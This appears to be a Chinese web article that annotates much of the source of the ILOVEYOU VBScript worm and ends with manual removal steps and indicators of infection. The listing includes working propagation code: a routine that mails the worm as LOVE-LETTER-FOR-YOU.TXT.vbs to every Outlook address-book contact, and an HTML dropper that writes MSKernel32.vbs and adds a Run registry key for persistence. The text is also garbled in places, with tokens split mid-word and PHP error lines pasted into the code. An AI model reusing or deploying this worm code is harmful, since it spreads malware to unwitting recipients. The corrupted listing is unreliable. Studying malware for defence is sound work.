
📄 “i love you”病毒原理 .txt

' 遍历文件夹 
On Error Resume Next 
dim f,f1,sf 
set f = fso.GetFolder(folderspec) 
set sf = f.SubFolders 
for each f1 in sf 
infectfiles(f1.path) 
folderlist(f1.path) 
next 
end sub 
sub regcreate(regkey,regvalue) 
' Modify the registry (create a value): regkey is the full value path and
' regvalue the data to store, both supplied by the caller.
' Original annotator's remark: this routine appears to be a Microsoft sample program.
' Analyst note: the write goes through WScript.Shell.RegWrite; the callers that
' decide which keys are written are outside this excerpt.
Set regedit = CreateObject("WScript.Shell") 
regedit.RegWrite regkey,regvalue 
end sub  
function regget(value) 
' Read a registry value: returns whatever WScript.Shell.RegRead yields for the
' path passed in as value.
' Original annotator's remark: this also appears to be a Microsoft sample program
' (a WSH sample found in the Windows folder).
Set regedit = CreateObject("WScript.Shell") 
regget=regedit.RegRead(value) 
end function 
function fileexist(filespec) 
' Test whether a file exists.
' Returns 0 when fso.FileExists(filespec) is true and 1 otherwise, so the
' result is inverted relative to a boolean "exists" flag.
' fso is not created here; it is expected to be set elsewhere in the script.
' Original annotator's remarks: purely from a technical point of view this
' routine is not well written; the same result needs far less code.
On Error Resume Next 
dim msg 
if (fso.FileExists(filespec)) Then 
msg = 0 
else 
msg = 1 
end if 
fileexist = msg 
end function 
function folderexist(folderspec) 
' Test whether a folder exists (intended to mirror fileexist: 0 = exists, 1 = not).
' Original annotator's remark: as poorly written as the previous routine.
' NOTE(review): as published, the last assignment targets the name fileexist,
' not folderexist, so this function's own return value is never set here; the
' method name GetFolderExists also looks unusual for FileSystemObject - confirm
' against the object model. Errors are suppressed by On Error Resume Next, so
' neither problem would surface at run time.
On Error Resume Next 
dim msg 
if (fso.GetFolderExists(folderspec)) then 
msg = 0 
else 
msg = 1 
end if 
fileexist = msg 
end function 
sub spreadtoemail() 
' Spread through e-mail (original annotation).
' Reading aid for analysts: the routine walks every MAPI address list that
' Outlook exposes and sends one message per address-book entry that has no
' marker in the registry yet.
' Indicators visible in this routine:
'   - message subject "ILOVEYOU"
'   - attachment LOVE-LETTER-FOR-YOU.TXT.vbs (double extension; the real type is .vbs)
'   - values written under HKEY_CURRENT_USER\Software\Microsoft\WAB\
' dirsystem is not assigned in this routine; presumably it holds the system
' folder path set elsewhere in the script - confirm against the full listing.
' NOTE: some statements below are split mid-token by the hosting page's line
' wrapping; the text is kept exactly as published.
On Error Resume Next 
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad 
set regedit=CreateObject("WScript.Shell") 
set out=WScript.CreateObject("Outlook.Application") 
' Limitation of the virus: only Outlook is supported, Outlook Express is not.
set mapi=out.GetNameSpace("MAPI") 
for ctrlists=1 to mapi.AddressLists.Count 
set a=mapi.AddressLists(ctrlists) 
x=1 
' Per-list counter kept in the registry: the entry count recorded on an
' earlier run (it is written back at the end of this loop body).
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) 
if (regv="") then 
regv=1 
end if 
' Only lists that now hold more entries than the recorded count are processed.
if (int(a.AddressEntries.Count)>int(regv)) then 
for ctrentries=1 to a.AddressEntries.Count 
malead=a.AddressEntries(x) 
regad="" 
' Per-recipient marker: an empty read means no marker exists for this address.
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male 
ad) 
if (regad="") then 
set male=out.CreateItem(0) 
male.Recipients.Add(malead) 
male.Subject = "ILOVEYOU" 
' Origin of the virus's name.
' A mail that looks like this is certainly the virus.
' A person in their right mind would hardly be this blunt.
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from m 
e." 
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 
male.Send 
' Record the recipient as handled (value 1, REG_DWORD) under the WAB key.
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1, 
"REG_DWORD" 
end if 
x=x+1 
next 
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addre 
ssEntries.Count 
else 
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addre 
ssEntries.Count 
end if 
next 
Set out=Nothing 
Set mapi=Nothing 
end sub 
sub html 
' Original annotator's remarks:
'   From a technical point of view this code is nicely written, because it
'   makes full use of Outlook's resources; the annotator considers it worth
'   studying.
'   The _ characters inside the routine are line continuations, which is why
'   the annotations are written here at the top.
'   The program contains many statements that do nothing and waste space.
' Reading aid for analysts: the routine assembles an HTML page in two string
' halves (dta1, dta2), with the script's own source text written between
' them, and saves the result as LOVE-LETTER-FOR-YOU.HTM under dirsystem.
' Inside the string literals, quote and slash characters are stored as
' three-character placeholders (#-#, @-@, ?-?, ^-^) and swapped back by the
' replace() calls further down.
' Indicators visible in the embedded page script:
'   - file MSKernel32.vbs created in the folder returned by GetSpecialFolder(1)
'   - value MSKernel32 under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
'   - page text asking the reader to press YES to enable ActiveX
' dirsystem is not assigned in this routine; presumably it is set elsewhere
' in the script - confirm against the full listing.
' NOTE(review): the three "Warning: Unexpected character in input ..." lines
' near the end are error output from the hosting site's page renderer, not
' script text, and several literals are split by the page's line wrapping;
' everything is kept exactly as published.
On Error Resume Next 
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Gene  
rator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ 
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @G  
RAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ 

"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is go  
od...@-@>"&vbcrlf& _ 
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LO 
VE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ 
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YO 
U.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@ 
>"&vbcrlf& _  
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to r 
ead this HTML file<BR>- Please press #-#YES#-# button to Enable Active 
X<?-?p>"&vbcrlf& _  
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>-------- 
--z--------------------z----------<?-?MARQUEE> "&vbcrlf& _  
"<?-?BODY><?-?HTML>"&vbcrlf& _  
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _  
"<!--?-??-?"&vbcrlf& _  
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight 
;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _  
"?-??-?-->"&vbcrlf& _  
"<?-?SCRIPT>"&vbcrlf& _  
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _  
"<!--"&vbcrlf& _  
"on error resume next"&vbcrlf& _  
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _  
"aw=1"&vbcrlf& _  
"code="  
' Second half of the page: the embedded script that writes MSKernel32.vbs and
' the Run value listed in the header comment.
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf&  
_  
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _  
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _  
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _  
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _  
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf  
& _  
"wri.write code4"&vbcrlf& _  
"wri.close"&vbcrlf& _  
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf&  
_  
"if (err.number=424) then"&vbcrlf& _  
"aw=0"&vbcrlf& _  
"end if"&vbcrlf& _  
"if (aw=1) then"&vbcrlf& _  
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _  
"window.close"&vbcrlf& _  
"end if"&vbcrlf& _  
"end if"&vbcrlf& _  
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _  
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windo 
ws^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.v 
bs@-@"&vbcrlf& _  
"?-??-?-->"&vbcrlf& _  
"<?-?SCRIPT>"  
' Placeholder decoding for both halves: chr(35)-chr(35) is #-#, chr(64)-chr(64)
' is @-@, chr(63)-chr(63) is ?-? and chr(94)-chr(94) is ^-^ (chr(45) is "-").
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")  
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")  
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")  
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") 
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") 
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") 
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") 
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") 
' The running script reads its own file (WScript.ScriptFullName) line by line.
set fso=CreateObject("Scripting.FileSystemObject") 
set c=fso.OpenTextFile(WScript.ScriptFullName,1) 
lines=Split(c.ReadAll,vbcrlf) 
l1=ubound(lines) 
' Each source line has its quote characters replaced by placeholders and is
' wrapped in double quotes; every line except the last also gets a
' continuation suffix.
for n=0 to ubound(lines) 
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) 
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) 
lines(n)=replace(lines(n),"
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /z1/shanguo/public_html/soudu/read_article.php on line 131
",chr(37)+chr(45)+chr(37)) 
if (l1=n) then 
lines(n)=chr(34)+lines(n)+chr(34) 
else 
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" 
end if 
next 
' Output file: created empty, reopened for writing (mode 2), then filled with
' the first half, the encoded source lines, and the second half.
set b=fso.CreateTextFile(dirsystem+"
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /z1/shanguo/public_html/soudu/read_article.php on line 131
LOVE-LETTER-FOR-YOU.HTM") 
b.close 
set d=fso.OpenTextFile(dirsystem+"
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /z1/shanguo/public_html/soudu/read_article.php on line 131
LOVE-LETTER-FOR-YOU.HTM",2) 
d.write dt5  
d.write join(lines,vbcrlf) 
d.write vbcrlf  
d.write dt6  
d.close  
end sub  


“I LOVE YOU”病毒的解毒步骤  
1、如你的电脑感染该病毒,请在 Windows 下按 CTRL+ALT+DEL,查看正在运行的任务中是否有 wscript(Windows 脚本宿主进程);如有,你已感染。请选中该项,并将其“结束任务”。  

2、请进入c:\windows\system中,运行MSCONFIG.EXE进入“启动”菜单,将所有  
的后缀为*.vbs的文件选择为禁用状态。  
3、“确定”后重新启动电脑。(切记:需保证内存中无wscript这个文件,才可  
关闭)  
4、删除含 LOVE-LETTER-FOR-YOU.TXT 附件的邮件(按上面的代码,附件的完整文件名是 LOVE-LETTER-FOR-YOU.TXT.vbs,真正的扩展名是 .vbs,并不是文本文件)。 
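5、病毒杀除,但尸体留在您的电脑中了 :-) 也就是说,病毒文件本身仍留在磁盘上。按上面的代码,可在系统目录(代码中的 dirsystem)检查 MSKernel32.vbs、LOVE-LETTER-FOR-YOU.HTM 和 LOVE-LETTER-FOR-YOU.TXT.vbs,并检查注册表 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 下的 MSKernel32 值,以及 HKEY_CURRENT_USER\Software\Microsoft\WAB\ 下由脚本写入的标记值。 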


by quack  
  参考:Analysis of the LOVE-LETTER-FOR-YOU virus/worm   
